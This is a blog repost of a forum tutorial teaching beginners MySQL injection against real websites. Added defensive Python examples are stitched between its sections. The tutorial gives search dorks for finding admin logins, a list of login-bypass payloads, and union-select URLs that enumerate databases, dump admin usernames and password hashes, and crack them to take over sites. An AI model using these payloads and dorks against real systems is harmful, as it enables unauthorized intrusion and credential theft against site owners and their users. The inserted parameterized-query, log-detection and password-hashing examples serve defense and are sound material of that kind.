Every hacker is dangerous, whether he/she is a small or a big hacker, because all hackers have their own style. So honor them. If you don't honor them, you will surely lose the game... Ha Ha Ha... This is really a charming game I like. I honor all hackers who know the tricks to defeat the rules and the rules of your life.

Wednesday, 22 February 2012

Full book of MySQL, tested by me when I was a noob

[TuT] SQLi - MySQL Injection. - Phizo - 16-01-2012 09:10 AM

Today I will be teaching you guys MySQL injection. This is a basic tutorial; it does not cover any advanced methods.

What is MySQL injection?
MySQL injection, also known as SQLi, is a very common website vulnerability: input that you control (a URL parameter in the address bar, or a field on a login page) is pasted into the text of a MySQL query without escaping, so the query you type is executed by the database.

What can I accomplish with MySQL injection?
You can view columns and tables within the MySQL database. This includes usernames and passwords, billing information, etc.

Table of contents:
#Bypassing the Administrator login.
  Finding vulnerable websites.
  Using MySQL queries to bypass the Administrator login and gain Administrator privileges.
#Using union based MySQL injection to pull up columns and tables.
  Finding vulnerable websites.
  Finding out how many columns there are in the database.
  Selecting our columns.
  Enumerating the MySQL database for information.
  Viewing tables and columns to locate logins.
  Cracking the password if not in plain text.

#Bypassing the Administrator login.
I will now teach you how to bypass the Administrator login.

Finding vulnerable websites.
We only need one thing: search engine dorks.

Search engine dorks:

Code:
inurl:adminlogin.asp
inurl:administratorlogin.asp
inurl:administrator_login.asp

For this tutorial I will be using "inurl:administratorlogin.asp"; enter it in a search engine such as Google.

Owning the login.

Once we have found an Administrator login page, we need to submit a MySQL query fragment to bypass the login.
Here are some MySQL queries that can be used to bypass the Administrator login:

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

I will be using the very top one (' or '1'='1) since I am used to it. It doesn't matter which one you use, though.

The username should always be: admin (no capitals)
The password should always be: one of the MySQL queries listed above.

So in this case, my login will be:
Username: admin
Password: ' or '1'='1

Once you have found a vulnerable login, it should look something like this:
http://img823.imageshack.us/img823/9757/sqli1.png

Once you have logged in as Administrator you will have full access over the website. You can do whatever you like with it.
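To see exactly why the login above falls over, here is an added example (not code from the tutorial) that builds the login query both ways. It uses Python's built-in sqlite3 as a stand-in for MySQL so it runs offline (an assumption; the string-concatenation bug is the same in either engine), with a constructed two-row admin table stored in plaintext only for brevity.

```python
import sqlite3

# Constructed sample rows; sqlite3 stands in for MySQL so the demo runs offline.
USERS = [("admin", "s3cret-admin-pw"), ("alice", "wonderland")]

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?, ?)", USERS)
    return conn

def login_vulnerable(conn, username: str, password: str) -> bool:
    # The bug the tutorial exploits: user input is pasted into the SQL text.
    # With the password "' or '1'='1" the WHERE clause becomes
    #   username='admin' AND password='' or '1'='1'
    # AND binds tighter than OR, so the row is returned whatever the password.
    sql = ("SELECT username FROM admin WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username: str, password: str) -> bool:
    # The fix: placeholders send the values separately from the query text,
    # so a quote inside the password is just a character being compared.
    sql = "SELECT username FROM admin WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

PAYLOAD = "' or '1'='1"   # the first bypass string listed in the tutorial

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, "admin", PAYLOAD))      # True
    print("parameterized:", login_parameterized(db, "admin", PAYLOAD))   # False
```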

#Union based MySQL injection.
I will now show you a more advanced, and more common, way of hacking websites.

Finding vulnerable websites.
To find vulnerable websites we will need the following things:

Exploit scanner: http://www.hackforums.net/showthread.php?tid=941074 - Shows tutorial with download link.
Search engine dorks: http://pastebin.com/NnhPj8SB - (inurl:dorkhere)

Once you have found a site, try this: http://site.com/index.php?id=1337' (the trailing ' tests whether it is vulnerable; if the page returns a database error, the value is reaching the query unescaped)


Finding how many columns there are in the database.
Once we have found our website (in this case: http://site.com/index.php?id=1337) we will inject MySQL queries to find out some relevant information about the target's website.

Okay, we're at the target's website. We now want to find out how many columns there are. We determine this from the output we get for each of the following requests.

Code:
http://site.com/index.php?id=1337 order by 5-- (no error)
http://site.com/index.php?id=1337 order by 10-- (error)
http://site.com/index.php?id=1337 order by 9-- (error)
http://site.com/index.php?id=1337 order by 8-- (no error)

Everything besides the "(error)" / "(no error)" annotations must be included in the URL. Basically, you must find the largest number that does not produce an error (one below the first number that does). In this case it's 8, so there are 8 columns (strictly speaking, 8 columns in the query the page itself runs, which is what order by is counting).

Selecting the columns
Okay, we have now found out there are 8 columns. We will now need to select those columns to move on.

Code:
http://site.com/index.php?id=-1337 union all select 1,2,3,4,5,6,7,8--

If you see numbers pop up on the webpage, then you can proceed.

Enumerating the MySQL database
Enumeration basically means finding/gathering information. The more information we have on the MySQL database, the easier it will be to exploit.

We want to find the following:
The version of the MySQL database.
How many databases there are.
The target's username for the MySQL database.


Okay. We see the numbers on the webpage; for this tutorial I will be using "4" (it depends which numbers are displayed on your page). Go to the URL address bar and replace the 4 with a MySQL query.

Code:
http://site.com/index.php?id=1337 union all select 1,2,3,MYSQLQUERYHERE,5,6,7,8--

The MySQL queries we will be using are:

Code:
@@version or version()
- Determines what MySQL version the database is running.
Code:
user()
- Determines the username the target uses for the MySQL database.
Code:
database()
- Determines which database you are currently viewing.

This will be used as the following:

Version:

Code:
http://site.com/index.php?id=1337 union all select 1,2,3,@@version,5,6,7,8--

User:

Code:
http://site.com/index.php?id=1337 union all select 1,2,3,user(),5,6,7,8--

Database:

Now pulling up the database(s) is a little more tricky. In MySQL each database is known as a "schema", and the list of them is kept in the schemata table of information_schema; this is what our query looks like if we want to pull up the database(s):

Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata--

We have now located the version, the username, and how many databases there are.

Viewing tables and columns.

Version 5
If you came across a version 5 MySQL database, then keep reading this section. If you found a version 4 then scroll down to the next section.

We've found out that our MySQL database is running version 5. Now we want to grab the tables and columns. First we will start with gathering the tables.

The MySQL query to view tables:
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables--

We will be looking for tables such as:
Code:
admin(s), user(s), member(s), admin_tbl, user_tbl, member_tbl
Basically just anything that looks like it stores accounts.

Okay, I've found a table called "admin"; now we want to view its columns, which in this case hold the logins.

We will need to convert our table "admin" into a hex string. To get the hex string we will need a converter: http://www.swingnote.com/tools/texttohex.php

We put our table in (admin) and we have converted it to hex. This is what our hex string looks like:

Code:
61646d696e

We need to put "0x" in front of it so that MySQL treats it as a hex string literal (equivalent to the quoted string 'admin', but written without quote characters). Our hex code will then be "0x61646d696e".
Now that we have the hex code for the admin table, we will view the columns inside it. This is what our MySQL query will look like:

Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name=0x61646d696e--

The query above reads naturally: you are grabbing the column names from information_schema.columns (where MySQL stores metadata about every column) for the rows whose table name is admin. Simply put, you're listing the columns of the admin table.

The following columns came up on our webpage:
username
password


There are many different types of columns. It could be:
user, userid, member, account, etc.
pass, passwd, pwd, etc.

We now want to write a new MySQL query to view the username(s) and password(s) of our table "admin", our code will be:

Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(username,0x3a,password),5,6,7,8 from admin--

The "0x3a" is the hex literal for a colon and separates the two columns. Basically, the above query grabs the columns' data from the admin table, giving us the username and password of the Administrator.
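Every request in this walkthrough leaves a distinctive trace in the web server log. The following is an added detection example (not part of the tutorial) that scans constructed access-log lines in the common Apache/nginx "combined" format (an assumption) for the order by, union select, @@version/user()/database(), information_schema and 0x hex-literal probes described above.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probes this tutorial walks through, in the order they appear.
# Matching is done on the URL-decoded, lower-cased request path.
SIGNATURES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+")),
    ("union select",       re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("db fingerprinting",  re.compile(r"@@version|\bversion\(\)|\buser\(\)|\bdatabase\(\)")),
    ("schema enumeration", re.compile(r"information_schema\.(schemata|tables|columns)")),
    ("hex string literal", re.compile(r"\b0x[0-9a-f]{4,}\b")),
]

def classify_request(url: str) -> list:
    """Return the names of every signature that matches one request URL."""
    decoded = unquote_plus(url).lower()
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_access_log(lines):
    """Yield (client_ip, url, matches) for each log line that trips a signature."""
    # Assumes "combined" log format: ip - - [time] "METHOD url HTTP/x" status bytes
    line_rx = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = line_rx.match(line)
        if not m:
            continue
        hits = classify_request(m.group(2))
        if hits:
            yield m.group(1), m.group(2), hits

# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jan/2012:09:10:01 +0000] "GET /index.php?id=1337 HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Jan/2012:09:10:05 +0000] "GET /index.php?id=1337%20order%20by%2010-- HTTP/1.1" 500 88',
    '203.0.113.7 - - [16/Jan/2012:09:10:09 +0000] "GET /index.php?id=-1337%20union%20all%20select%201,2,3,@@version,5,6,7,8-- HTTP/1.1" 200 640',
    '203.0.113.7 - - [16/Jan/2012:09:10:14 +0000] "GET /index.php?id=1337%20union%20all%20select%201,2,3,group_concat(column_name),5,6,7,8%20from%20information_schema.columns%20where%20table_name=0x61646d696e-- HTTP/1.1" 200 701',
    '198.51.100.2 - - [16/Jan/2012:09:11:00 +0000] "GET /about.php HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, url, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits, url)
```

A burst of column-count probes followed by union selects from one client, as in the sample, is the sequence worth alerting on even when the individual requests return 200.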

Our output is on our webpage. A username and a hash. The output looks like the following:

Code:
admin:21232f297a57a5a743894a0e4a801fc3

The colon (:) separates the username from the password. The password is "21232f297a57a5a743894a0e4a801fc3" while the username is "admin"; however, the password is stored as an MD5 hash rather than in plain text. We now need to crack the hash to recover the plain text password.

MD5 hash cracker: http://lmgtfy.com/?q=MD5+Hash+Cracker

We have now cracked the MD5 hash (21232f297a57a5a743894a0e4a801fc3) and we have found out what the real password is. The password was "admin". So the username is "admin" and the password is "admin" as well. We can now log into the website as Administrator and do whatever we like with the website.
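The reason that hash fell so quickly is that it is an unsalted MD5 of a common word, so one precomputed table answers it for every site. As an added example (not from the tutorial), the block below checks the page's hash against a tiny constructed wordlist and then shows the storage scheme that defeats this: a per-user random salt with a slow, iterated KDF (PBKDF2-HMAC-SHA256 from the standard library is used as the illustration; bcrypt, scrypt or argon2 are equally appropriate).

```python
import hashlib
import hmac
import os
from typing import Optional

PAGE_HASH = "21232f297a57a5a743894a0e4a801fc3"   # the hash shown in the tutorial

def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()

def md5_wordlist_lookup(target_hex: str, wordlist) -> Optional[str]:
    """Unsalted MD5: any wordlist that contains the password recovers it directly."""
    for word in wordlist:
        if md5_hex(word) == target_hex:
            return word
    return None

# Stored form for the mitigation: "pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>"
ITERATIONS = 600_000

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = salt or os.urandom(16)            # fresh random salt per user
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # constant-time comparison so timing does not leak how many bytes matched
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    # constructed three-word list; "admin" is the tutorial's recovered password
    print(md5_wordlist_lookup(PAGE_HASH, ["password", "123456", "admin"]))
    stored = hash_password("admin")
    print(stored)
    print(verify_password("admin", stored), verify_password("wrong", stored))
```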

Version 4
Okay, our MySQL database was version 4. This is a lot harder to exploit, but not impossible. If you're a beginner I would recommend just finding a version 5 database instead.

We have to guess the tables and columns. There is no information_schema and no concat, so we cannot use group_concat(); it requires hard thought and guessing skill.
We already know some common table and column names, so we can now guess to find the username and password of our target.

Code:
http://site.com/index.php?id=1337 union all select 1,2,3,username,password,6,7,8 from admin-- (error)
http://site.com/index.php?id=1337 union all select 1,2,3,user,pass,6,7,8 from member-- (error)
http://site.com/index.php?id=1337 union all select 1,2,3,userid,pass,6,7,8 from users-- (page loads with text on screen - no error)

If you do manage to guess them, the username and password (hash) should appear on the webpage. You can then crack the hash and log in.

I hope you all enjoyed my tutorial. It took me a long time to write.

Happy hacking ;)
